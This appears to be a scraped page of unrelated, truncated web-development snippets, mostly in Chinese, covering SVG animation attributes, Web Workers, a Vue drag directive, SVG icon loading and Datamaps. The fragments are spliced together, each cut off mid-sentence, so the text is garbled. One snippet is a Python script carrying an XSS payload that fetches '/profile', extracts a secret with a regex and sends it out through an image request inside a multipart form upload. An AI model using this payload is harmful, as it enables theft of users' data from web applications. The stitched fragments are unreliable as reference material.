const regExp = /id="[\u4e00-\u9fa5]*_\d*" data-name="[\u4e00-\u9fa5]* \d*"/
attributeName使用和指定动画的目标属性attributeType 所有动画元素还共享另一个属性:attributeName. 该attributeName属性用于指定你正在设置动画的属性的名称。 例如,如果你想为 x 轴上 a 的中心位置设置动画,你可以通过指定as属性cx的值来实现。attributeName attributeName只接受一个值,而不是值列表,因此,你一次只能为...
//demo_workers.jsvar i = 0;setTimeout(function(){i=i+1postMessage(i)//使用postMessage(数据)发送},3000) 添加onmessage事件监听器,监听接收消息,访问event.data获得消息 w.onmessage = function (event) {document.getElementById("result").innerHTML =;}; 5、关闭worker Worker线程无法读...
Whether compressed or plain-text transfer encoding is used, the svgDocLength field of the SVG document record specifies the length of the encoded data, not the decoded document. The character encoding of the (uncompressed) SVG document must be UTF-8. ...
data() { return {}; }, directives: { // 拖拽指令 drag: function (el, binding) { const dragBox = el; // 获取当前元素 // 当选中对象为输入框或者文本框不执行拖拽操作 dragBox.onmousedown = (e) => { if ( === 'INPUT' || === 'TEXTAREA') { ...
const data = {state: {iconsMap: []},generate (iconsMap) {this.state.iconsMap = iconsMap}}export default data 在SvgList.vue中使用: import icons from '@/utils/svgConfig/generateIconsView'export default {name: 'icons',data () {return {iconsMap: []}},mounted () {const iconsMap = ico...
(点击前);-webkit-tap-highlight-color:transparent;-webkit-user-select:none;" viewbox="0 0 750 1334" data-Copyright="GL"> <animate attributename="opacity" begin="click" dur="1" values="1;0" repeatCount="indefinite" fill="freeze" restart="whenNotActive"></animate> <set attributeName="...
import requests, random payload = '''fetch("/profile").then(function(e){e.text().then(function(f){new/**/Image().src='//'+/secret(.*)>/.exec(f)[0]})})''' raw_data = '''---WebKitFormBoundary8XvNm1gXcAtb4Hik Content-Disposition: form-data; name="firstnam...
var map = new Datamap({ element: document.getElementById('container'), fills: { defaultFill: 'rgba(23,48,210,0.9)' // Any hex, color name or rgb/rgba value } }); Disabling popup or hover effects var map = new Datamap({ element: document.getElementById('container'), geographyCon...